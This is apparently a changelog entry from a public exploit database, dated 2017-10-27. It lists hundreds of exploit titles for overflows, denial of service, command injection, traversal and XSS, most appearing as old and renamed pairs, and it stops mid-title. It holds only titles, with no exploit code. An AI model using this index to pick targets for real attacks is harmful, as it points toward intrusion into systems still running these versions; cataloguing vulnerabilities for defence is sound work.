DB: 2017-10-27
2 new exploits Microsoft Windows XP/2000 - TCP Connection Reset Remote Exploit Microsoft Windows XP/2000 - TCP Connection Reset WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflows (PoC) WinEggDropShell 1.7 - Unauthenticated Multiple Remote Stack Overflows (PoC) FileCOPA FTP Server 1.01 - 'USER' Remote Unauthenticated Denial of Service FileCOPA FTP Server 1.01 - 'USER' Unauthenticated Remote Denial of Service Mercury/32 Mail SMTPD - Remote Unauthenticated Stack Based Overrun (PoC) Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Based Overrun (PoC) Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC) Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC) Simple HTTPD 1.41 - '/aux' Remote Denial of Service Simple HTTPd 1.41 - '/aux' Remote Denial of Service MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial of Service MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Denial of Service Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service Oracle Internet Directory 10.1.4 - Unauthenticated Remote Denial of Service Linksys WAG54G v2 Wireless ADSL Router - httpd Denial of Service Linksys WAG54G v2 Wireless ADSL Router - HTTPd Denial of Service Nofeel FTP Server 3.6 - 'CWD' Command Remote Memory Consumption Nofeel FTP Server 3.6 - 'CWD' Remote Memory Consumption Home FTP Server 1.10.1.139 - 'SITE INDEX' Command Remote Denial of Service Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC) httpdx 1.5.2 - Unauthenticated Remote Denial of Service (PoC) httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service Vulnerabilities (PoC) httpdx 1.5.3b - Unauthenticated Remote Denial of Service Multiple Vulnerabilities (PoC) eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crashs (SEH) (PoC) eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Crashs (SEH) (PoC) TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1) TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (1) (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Command Remote Denial of Service (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Remote Denial of Service Motorola SB5101 Hax0rware Rajko HTTPD - Remote Exploit (PoC) Motorola SB5101 Hax0rware Rajko HTTPd - Remote Exploit (PoC) Unreal Tournament 3 2.1 - 'STEAMBLOB' Command Remote Denial of Service Unreal Tournament 3 2.1 - 'STEAMBLOB' Remote Denial of Service TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2) TYPSoft FTP Server 1.10 - 'RETR' Denial of Service (2) Objectivity/DB - Lack of Authentication Remote Exploit Objectivity/DB - Lack of Authentication IPComp - encapsulation Unauthenticated kernel memory Corruption IPComp - encapsulation Unauthenticated Kernel Memory Corruption Crush FTP 5 - 'APPE' command Remote JVM Blue Screen of Death (PoC) Crush FTP 5 - 'APPE' Remote JVM Blue Screen of Death (PoC) torrent-stats - httpd.c Denial of Service torrent-stats - 'httpd.c' Denial of Service Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor status.cgi Denial of Service Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor 'status.cgi' Denial of Service WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service Linksys BEFSR41 1.4x - Gozila.cgi Denial of Service Linksys BEFSR41 1.4x - 'Gozila.cgi' Denial of Service BRS Webweaver 1.06 httpd - 'User-Agent' Remote Denial of Service BRS Webweaver 1.06 - HTTPd 'User-Agent' Remote Denial of Service Surfboard httpd 1.1.9 - Remote Buffer Overflow Surfboard HTTPd 1.1.9 - Remote Buffer Overflow RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service RobotFTP Server 1.0/2.0 - Unauthenticated Remote Command Denial of Service Titan FTP Server 3.0 - 'LIST' Command Denial of Service Titan FTP Server 3.0 - 'LIST' Denial of Service Monkey HTTPD 1.1.1 - Crash (PoC) Monkey HTTPd 1.1.1 - Crash (PoC) Alt-N MDaemon 2-8 - Remote Unauthenticated IMAP Buffer Overflow Alt-N MDaemon 2-8 - IMAP Unauthenticated Remote Buffer Overflow Titan FTP Server 6.05 build 550 - 'DELE' Command Remote Buffer Overflow Titan FTP Server 6.05 build 550 - 'DELE' Remote Buffer Overflow Surgemail and WebMail 3.0 - 'Page' Command Remote Format String Surgemail and WebMail 3.0 - 'Page' Remote Format String Call of Duty 4 1.5 - Malformed 'stats' Command Denial of Service Call of Duty 4 1.5 - 'stats' Denial of Service Softalk Mail Server 8.5.1 - 'APPEND' Command Remote Denial of Service Softalk Mail Server 8.5.1 - 'APPEND' Remote Denial of Service FileCOPA FTP Server 5.01 - 'NOOP' Command Denial of Service FileCOPA FTP Server 5.01 - 'NOOP' Denial of Service Hybserv2 - ':help' Command Denial of Service Hybserv2 - ':help' Denial of Service Titan FTP Server 8.40 - 'APPE' Command Remote Denial of Service Titan FTP Server 8.40 - 'APPE' Remote Denial of Service TYPSoft FTP Server 1.1 - 'APPE' Command Remote Buffer Overflow TYPSoft FTP Server 1.1 - 'APPE' Remote Buffer Overflow Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial of Service Sony Bravia KDL-32CX525 - 'hping' Remote Denial of Service SmallFTPd 1.0.3 - 'mkd' Command Denial of Service freeFTPd 1.0.8 - 'mkd' Command Denial of Service SmallFTPd 1.0.3 - 'mkd' Denial of Service freeFTPd 1.0.8 - 'mkd' Denial of Service Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service Wireshark 2.2.0 < 2.2.12 - ROS Dissector Denial of Service AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation xp-AntiSpy 3.9.7-4 - '.xpas' file Buffer Overflow xp-AntiSpy 3.9.7-4 - '.xpas' File Buffer Overflow GTA SA-MP server.cfg - Buffer Overflow (Metasploit) GTA SA-MP - 'server.cfg' Buffer Overflow (Metasploit) SCO Unixware 7.1 - 'pkg' command Exploit SCO Unixware 7.1 - 'pkg' Exploit Caldera UnixWare 7.1.1 - WebTop SCOAdminReg.cgi Arbitrary Command Execution Caldera UnixWare 7.1.1 - WebTop 'SCOAdminReg.cgi' Arbitrary Command Execution OSSEC 2.7 < 2.8.1 - 'diff' Command Privilege Escalation OSSEC 2.7 < 2.8.1 - 'diff' Privilege Escalation Microsoft Windows 10 - pcap Driver Privilege Escalation Microsoft Windows 10 - 'pcap' Driver Privilege Escalation PHPMailer < 5.2.21 - Local File Disclosure HitmanPro 3.7.15 Build 281 - Kernel Pool Overflow Apache 2.0.45 - APR Remote Exploit Apache 2.0.45 - 'APR' Remote Exploit RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Command Remote Exploit RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Exploit Pavuk Digest - Authentication Buffer Overflow Remote Exploit Pavuk Digest - Authentication Remote Buffer Overflow 3CServer 1.1 - FTP Server Remote Exploit 3CServer 1.1 (FTP Server) - Remote Exploit LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Remote Exploit LimeWire 4.1.2 < 4.5.6 - 'GET' Remote Exploit MailEnable Enterprise 1.x - Imapd Remote Exploit MailEnable Enterprise 1.x - IMAPd Remote Exploit Sumus 0.2.2 - httpd Remote Buffer Overflow Sumus 0.2.2 - HTTPd Remote Buffer Overflow Symantec Scan Engine 5.0.x - Change Admin Password Remote Exploit Symantec Scan Engine 5.0.x - Change Admin Password Mercur Messaging 2005 (Windows 2000 SP4) - IMAP (Subscribe) Remote Exploit Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Exploit CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow CoreHTTP 0.5.3alpha - HTTPd Remote Buffer Overflow Postcast Server Pro 3.0.61 - / Quiksoft EasyMail 'emsmtp.dll 6.0.1' Buffer Overflow Postcast Server Pro 3.0.61 / Quiksoft EasyMail - 'emsmtp.dll 6.0.1' Buffer Overflow Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow Mercury/32 4.52 IMAPD - 'SEARCH' Authenticated Overflow SonicWALL SSL-VPN - NeLaunchCtrl ActiveX Control Remote Exploit SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Exploit simple httpd 1.38 - Multiple Vulnerabilities Simple HTTPd 1.38 - Multiple Vulnerabilities Cisco IOS 12.3(18) - FTP Server Remote Exploit (Attached to GDB) Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB) freeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH) freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH) Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow (Metasploit) Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - 'apply.cgi' Buffer Overflow (Metasploit) Home FTP Server - 'MKD' Command Directory Traversal Home FTP Server - 'MKD' Directory Traversal Apple iTunes 8.1.x - 'daap' Buffer Overflow Remote Exploit Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflows (1) eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (1) eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflows (2) eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Stack Buffer Overflows (2) EasyFTP Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow EasyFTP Server 1.7.0.2 - 'MKD' Authenticated Remote Buffer Overflow Xftp client 3.0 - PWD Remote Exploit Xftp client 3.0 - 'PWD' Remote Exploit ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass) ProSSHD 1.2 - Authenticated Remote Exploit (ASLR + DEP Bypass) EasyFTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow EasyFTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow EasyFTP Server 1.7.0.11 - 'MKD' Authenticated Remote Buffer Overflow EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow EasyFTP Server 1.7.0.11 - 'CWD' Authenticated Remote Buffer Overflow EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow (Metasploit) CesarFTP 0.99g - 'MKD' Command Buffer Overflow (Metasploit) CesarFTP 0.99g - 'MKD' Buffer Overflow (Metasploit) Alt-N MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow (Metasploit) Alt-N MDaemon 6.8.5 - WorldClient 'form2raw.cgi' Stack Buffer Overflow (Metasploit) Linksys WRT54 Access Point - apply.cgi Buffer Overflow (Metasploit) Linksys WRT54 Access Point - 'apply.cgi' Buffer Overflow (Metasploit) Progea Movicon 11 - TCPUploadServer Remote Exploit Progea Movicon 11 - 'TCPUploadServer' Remote Exploit PCMan FTP Server Buffer Overflow - 'PUT' Command (Metasploit) PCMan FTP Server - 'PUT_ Buffer Overflow (Metasploit) Freefloat FTP Server - 'LIST' Command Buffer Overflow Freefloat FTP Server - 'LIST' Buffer Overflow KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow KnFTP 1.0.0 Server - 'USER' Remote Buffer Overflow SGI IRIX 6.3 - cgi-bin webdist.cgi Exploit SGI IRIX 6.3 - cgi-bin 'webdist.cgi' Exploit Matt Wright - FormHandler.cgi 2.0 Reply Attachment Matt Wright - 'FormHandler.cgi' 2.0 Reply Attachment Solution Scripts Home Free 1.0 - search.cgi Directory Traversal Solution Scripts Home Free 1.0 - 'search.cgi' Directory Traversal CNC Technology BizDB 1.0 - bizdb-search.cgi Remote Command Execution CNC Technology BizDB 1.0 - 'bizdb-search.cgi' Remote Command Execution 3R Soft MailStudio 2000 2.0 - userreg.cgi Arbitrary Command Execution 3R Soft MailStudio 2000 2.0 - 'userreg.cgi' Arbitrary Command Execution Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote 'Username' and Password Retrieval Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval Greg Matthews - Classifieds.cgi 1.0 MetaCharacter Greg Matthews - 'Classifieds.cgi' 1.0 MetaCharacter Squid Web Proxy 2.2 - cachemgr.cgi Unauthorized Connection Squid Web Proxy 2.2 - 'cachemgr.cgi' Unauthorized Connection Leif M. Wright - ad.cgi 1.0 Unchecked Input Leif M. Wright - 'ad.cgi' 1.0 Unchecked Input NCSA 1.3/1.4.x/1.5 / Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval NCSA 1.3/1.4.x/1.5 / Apache HTTPd 0.8.11/0.8.14 - ScriptAlias Source Retrieval SWSoft ASPSeek 1.0 - s.cgi Buffer Overflow SWSoft ASPSeek 1.0 - 's.cgi' Buffer Overflow Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp3.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp4.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - 'a1disp2.cgi' Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - 'a1disp3.cgi' Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - 'a1disp4.cgi' Traversal Arbitrary File Read Tarantella Enterprise 3 3.x - TTAWebTop.cgi Arbitrary File Viewing Tarantella Enterprise 3 3.x - 'TTAWebTop.cgi' Arbitrary File Viewing NCSA httpd 1.x - Buffer Overflow (1) NCSA httpd 1.x - Buffer Overflow (2) NCSA HTTPd 1.x - Buffer Overflow (1) NCSA HTTPd 1.x - Buffer Overflow (2) BPM Studio Pro 4.2 - HTTPD Directory Traversal BPM Studio Pro 4.2 - HTTPd Directory Traversal Light HTTPD 0.1 - GET Buffer Overflow (1) Light HTTPD 0.1 - GET Buffer Overflow (2) Light HTTPd 0.1 - GET Buffer Overflow (1) Light HTTPd 0.1 - GET Buffer Overflow (2) Null HTTPD 0.5 - Remote Heap Corruption Null HTTPd 0.5 - Remote Heap Corruption Boozt Standard 0.9.8 - index.cgi Buffer Overrun Boozt Standard 0.9.8 - 'index.cgi' Buffer Overrun Webmin 0.9x / Usermin 0.9x/1.0 - Session ID Spoofing Unauthenticated Access Webmin 0.9x / Usermin 0.9x/1.0 - Unauthenticated Access Session ID Spoofing Axis Communications Video Server 2.x - Command.cgi File Creation Axis Communications Video Server 2.x - 'Command.cgi' File Creation Freefloat FTP Server - 'PUT' Command Buffer Overflow Freefloat FTP Server - 'PUT' Buffer Overflow MNOGoSearch 3.1.20 - search.cgi UL Buffer Overflow (1) MNOGoSearch 3.1.20 - search.cgi UL Buffer Overflow (2) MNOGoSearch 3.1.20 - 'search.cgi?UL' Buffer Overflow (1) MNOGoSearch 3.1.20 - 'search.cgi?UL' Buffer Overflow (2) MySQL - Remote Unauthenticated User Enumeration (SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit MySQL - Unauthenticated Remote User Enumeration (SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Remote Authentication Bypass Freefloat FTP Server - 'USER' Command Buffer Overflow Freefloat FTP Server - 'USER' Buffer Overflow Mephistoles HTTPD 0.6 - Cross-Site Scripting Mephistoles HTTPd 0.6 - Cross-Site Scripting SurgeLDAP 1.0 - User.cgi Directory Traversal SurgeLDAP 1.0 - 'User.cgi' Directory Traversal Nagios3 - history.cgi Remote Command Execution Nagios3 - 'history.cgi' Remote Command Execution Nagios3 - history.cgi Host Command Execution (Metasploit) Nagios3 - 'history.cgi' Host Command Execution (Metasploit) Firebird 1.0 - Remote Unauthenticated Database Name Buffer Overrun Firebird 1.0 - Unauthenticated Remote Database Name Buffer Overrun acme thttpd 2.0.7 - Directory Traversal Acme thttpd 2.0.7 - Directory Traversal Freefloat FTP Server 1.0 - 'Raw' Commands Buffer Overflow Freefloat FTP Server 1.0 - 'Raw' Buffer Overflow NETGEAR DGN1000B - setup.cgi Remote Command Execution (Metasploit) NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit) Linksys E1500/E2500 - apply.cgi Remote Command Injection (Metasploit) Linksys E1500/E2500 - 'apply.cgi' Remote Command Injection (Metasploit) Linksys WRT54GL - apply.cgi Command Execution (Metasploit) Linksys WRT54GL - 'apply.cgi' Command Execution (Metasploit) NETGEAR DGN2200B - pppoe.cgi Remote Command Execution (Metasploit) NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit) SAP ConfigServlet - Remote Unauthenticated Payload Execution (Metasploit) SAP ConfigServlet - Unauthenticated Remote Payload Execution (Metasploit) GroundWork - monarch_scan.cgi OS Command Injection (Metasploit) GroundWork - 'monarch_scan.cgi' OS Command Injection (Metasploit) Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit) Linksys WRT160N v2 - 'apply.cgi' Remote Command Injection (Metasploit) WhitSoft SlimServe httpd 1.0/1.1 - Directory Traversal WhitSoft SlimServe HTTPd 1.0/1.1 - Directory Traversal Nginx 1.3.9/1.4.0 (x86) - Brute Force Remote Exploit Nginx 1.3.9/1.4.0 (x86) - Brute Force PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow PCMan FTP Server 2.07 - 'PASS' Buffer Overflow Mikrotik RouterOS sshd (ROSSSH) - Remote Unauthenticated Heap Corruption PCMan FTP Server 2.07 - 'STOR' Command Buffer Overflow Mikrotik RouterOS sshd (ROSSSH) - Unauthenticated Remote Heap Corruption PCMan FTP Server 2.07 - 'STOR' Buffer Overflow Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting Cisco Secure ACS 2.3 - 'LoginProxy.cgi' Cross-Site Scripting PCMan FTP Server 2.07 - 'STOR' Command Stack Overflow (Metasploit) PCMan FTP Server 2.07 - 'STOR' Stack Overflow (Metasploit) Supermicro Onboard IPMI - close_window.cgi Buffer Overflow (Metasploit) Supermicro Onboard IPMI - 'close_window.cgi' Buffer Overflow (Metasploit) Linksys WAG54GS 1.0.6 (Wireless-G ADSL Gateway) - setup.cgi Cross-Site Scripting Vulnerabilities Linksys WAG54GS 1.0.6 (Wireless-G ADSL Gateway) - 'setup.cgi' Cross-Site Scripting TinTin++ / WinTin++ 1.97.9 - '#chat' Command Multiple Vulnerabilities TinTin++ / WinTin++ 1.97.9 - '#chat' Multiple Vulnerabilities PCMan FTP Server 2.07 - 'ABOR' Command Buffer Overflow PCMan FTP Server 2.07 - 'CWD' Command Buffer Overflow PCMan FTP Server 2.07 - 'ABOR' Buffer Overflow PCMan FTP Server 2.07 - 'CWD' Buffer Overflow Ultra Mini HTTPD 1.21 - POST Stack Buffer Overflow Ultra Mini HTTPD 1.21 - 'POST' Stack Buffer Overflow Ultra Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit Ultra Mini HTTPD 1.21 - 'POST' Stack Buffer Overflow ALFTP FTP Client 4.1/5.0 - 'LIST' Command Directory Traversal ALFTP FTP Client 4.1/5.0 - 'LIST' Directory Traversal Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal Glub Tech Secure FTP 2.5.15 - 'LIST' Directory Traversal UltraEdit 14.00b - FTP/SFTP 'LIST' Command Directory Traversal WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Command Directory Traversal Classic FTP 1.02 - 'LIST' Command Directory Traversal UltraEdit 14.00b - FTP/SFTP 'LIST' Directory Traversal WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Directory Traversal Classic FTP 1.02 - 'LIST' Directory Traversal AceFTP 3.80.3 - 'LIST' Command Directory Traversal AceFTP 3.80.3 - 'LIST' Directory Traversal RhinoSoft Serv-U FTP Server 7.2.0.1 - 'rnto' Command Directory Traversal RhinoSoft Serv-U FTP Server 7.2.0.1 - 'rnto' Directory Traversal Vtiger - Install Unauthenticated Remote Command Execution (Metasploit) Vtiger - 'Install' Unauthenticated Remote Command Execution (Metasploit) httpdx 1.5 - 'MKD' Command Directory Traversal httpdx 1.5 - 'MKD' Directory Traversal D-Link Devices - Authentication.cgi Buffer Overflow (Metasploit) D-Link Devices - 'Authentication.cgi' Buffer Overflow (Metasploit) rbot 0.9.14 - '!react' Command Unauthorized Access rbot 0.9.14 - '!react' Unauthorized Access VMTurbo Operations Manager 4.6 - vmtadmin.cgi Remote Command Execution (Metasploit) VMTurbo Operations Manager 4.6 - 'vmtadmin.cgi' Remote Command Execution (Metasploit) Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow Solar FTP Server 2.1.1 - 'PASV' Remote Buffer Overflow Freefloat FTP Server - 'ALLO' Command Remote Buffer Overflow PCMan FTP Server 2.0.7 - 'MKD' Command Buffer Overflow Freefloat FTP Server - 'ALLO' Remote Buffer Overflow PCMan FTP Server 2.0.7 - 'MKD' Buffer Overflow Endian Firewall 2.4 - openvpn_users.cgi PATH_INFO Cross-Site Scripting Endian Firewall 2.4 - 'openvpn_users.cgi?PATH_INFO' Cross-Site Scripting PCMan FTP Server 2.0.7 - 'PUT' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'PUT' Buffer Overflow PCMan FTP Server 2.0.7 - 'GET' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'GET' Buffer Overflow PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'RENAME' Buffer Overflow Zpanel - Remote Unauthenticated Remote Code Execution (Metasploit) Zpanel - Unauthenticated Remote Code Execution (Metasploit) PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow (Metasploit) PCMan FTP Server 2.0.7 - 'RENAME' Buffer Overflow (Metasploit) IPFire - proxy.cgi Remote Code Execution (Metasploit) IPFire - 'proxy.cgi' Remote Code Execution (Metasploit) PCMan FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit) PCMan FTP Server 2.0.7 - 'ls' Buffer Overflow (Metasploit) EasyFTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow PCMan FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow Freefloat FTP Server 1.0 - 'ABOR' Command Buffer Overflow Freefloat FTP Server 1.0 - 'RMD' Command Buffer Overflow Freefloat FTP Server 1.0 - 'HOST' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'DELETE' Buffer Overflow Freefloat FTP Server 1.0 - 'ABOR' Buffer Overflow Freefloat FTP Server 1.0 - 'RMD' Buffer Overflow Freefloat FTP Server 1.0 - 'HOST' Buffer Overflow Freefloat FTP Server 1.0 - 'RENAME' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'UMASK' Command Buffer Overflow Freefloat FTP Server 1.0 - 'DIR' Command Buffer Overflow Freefloat FTP Server 1.0 - 'RENAME' Buffer Overflow PCMan FTP Server 2.0.7 - 'UMASK' Buffer Overflow Freefloat FTP Server 1.0 - 'DIR' Buffer Overflow PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow PCMan FTP Server 2.0.7 - 'ACCT' Buffer Overflow Freefloat FTP Server 1.0 - 'SITE ZONE' Buffer Overflow PCMan FTP Server 2.0.7 - 'NLST' Buffer Overflow PCMan FTP Server 2.0.7 - 'SITE CHMOD' Buffer Overflow PCMan FTP Server 2.0.7 - 'PORT' Buffer Overflow BolinTech DreamFTP Server 1.02 - 'RETR' Remote Buffer Overflow NETGEAR DGN2200 - dnslookup.cgi Command Injection (Metasploit) NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit) VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit) VICIdial 2.9 RC 1 < 2.13 RC1 - 'user_authorization' Unauthenticated Command Execution (Metasploit) CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Exploit phpBB 2.0.6 - search_id SQL Injection MD5 Hash Remote Exploit phpBB 2.0.6 - 'search_id' SQL Injection MD5 Hash Remote Exploit eXtropia Shopping Cart - web_store.cgi Remote Exploit eXtropia Shopping Cart - 'web_store.cgi' Remote Exploit Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Overwrite Remote Exploit TFT Gallery 0.10 - Password Disclosure Remote Exploit TFT Gallery 0.10 - Password Disclosure XOOPS 2.0.13.2 - xoopsOption[nocommon] Remote Exploit XOOPS 2.0.13.2 - 'xoopsOption[nocommon]' Remote Exploit Drupal 4.7 - attachment mod_mime Remote Exploit Drupal 4.7 - 'Attachment mod_mime' Remote Exploit Cahier de texte 2.0 - Database Backup/Source Disclosure Remote Exploit Cahier de texte 2.0 - Database Backup / Source Disclosure CSPartner 1.0 - Delete All Users / SQL Injection Remote Exploit CSPartner 1.0 - Delete All Users / SQL Injection Podcast Generator 1.2 - Unauthorized Re-Installation Remote Exploit Podcast Generator 1.2 - Unauthorized Re-Installation SPIP < 2.0.9 - Arbitrary Copy All Passwords to .XML File Remote Exploit SPIP < 2.0.9 - Arbitrary Copy All Passwords to '.XML' File Nagios3 - statuswml.cgi Command Injection (Metasploit) Nagios3 - 'statuswml.cgi' Command Injection (Metasploit) QuickTime Streaming Server - parse_xml.cgi Remote Execution (Metasploit) QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit) Nagios3 - statuswml.cgi Ping Command Execution (Metasploit) Nagios3 - 'statuswml.cgi' 'Ping' Command Execution (Metasploit) E-Mail Security Virtual Appliance - learn-msg.cgi Command Injection (Metasploit) E-Mail Security Virtual Appliance - 'learn-msg.cgi' Command Injection (Metasploit) AHG Search Engine 1.0 - search.cgi Arbitrary Command Execution AHG Search Engine 1.0 - 'search.cgi' Arbitrary Command Execution CGIScript.net - csPassword.cgi 1.0 Information Disclosure CGIScript.net - csPassword.cgi 1.0 HTAccess File Modification CGIScript.net - 'csPassword.cgi' 1.0 Information Disclosure CGIScript.net - 'csPassword.cgi' 1.0 HTAccess File Modification MailReader.com 2.3.x - NPH-MR.cgi File Disclosure MailReader.com 2.3.x - 'NPH-MR.cgi' File Disclosure BizDesign ImageFolio 2.x/3.0.1 - nph-build.cgi Cross-Site Scripting BizDesign ImageFolio 2.x/3.0.1 - 'nph-build.cgi' Cross-Site Scripting cPanel 5.0 - Guestbook.cgi Remote Command Execution (1) cPanel 5.0 - Guestbook.cgi Remote Command Execution (2) cPanel 5.0 - Guestbook.cgi Remote Command Execution (3) cPanel 5.0 - Guestbook.cgi Remote Command Execution (4) cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (1) cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (2) cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (3) cPanel 5.0 - 'Guestbook.cgi' Remote Command Execution (4) HappyMall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Command Execution HappyMall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' Command Execution HappyMall E-Commerce Software 4.3/4.4 - Member_HTML.cgi Command Execution HappyMall E-Commerce Software 4.3/4.4 - 'Member_HTML.cgi' Command Execution Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Cross-Site Scripting Happymall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' Cross-Site Scripting Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi File Disclosure Happymall E-Commerce Software 4.3/4.4 - 'Normal_HTML.cgi' File Disclosure Zeus Web Server 4.x - Admin Interface VS_Diag.cgi Cross-Site Scripting Zeus Web Server 4.x - Admin Interface 'VS_Diag.cgi' Cross-Site Scripting ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal ImageFolio 2.2x/3.0/3.1 - 'Admin.cgi' Directory Traversal SurgeLDAP 1.0 d - User.cgi Cross-Site Scripting SurgeLDAP 1.0 d - 'User.cgi' Cross-Site Scripting Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - Message.cgi Cross-Site Scripting Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - 'Message.cgi' Cross-Site Scripting CommerceSQL Shopping Cart 2.2 - index.cgi Directory Traversal CommerceSQL Shopping Cart 2.2 - 'index.cgi' Directory Traversal DansGuardian Webmin Module 0.x - edit.cgi Directory Traversal DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal ShopCartCGI 2.3 - gotopage.cgi Traversal Arbitrary File Access ShopCartCGI 2.3 - 'gotopage.cgi' Traversal Arbitrary File Access BoardPower Forum - ICQ.cgi Cross-Site Scripting BoardPower Forum - 'ICQ.cgi' Cross-Site Scripting Axis Network Camera 2.x And Video Server 1-3 - virtualinput.cgi 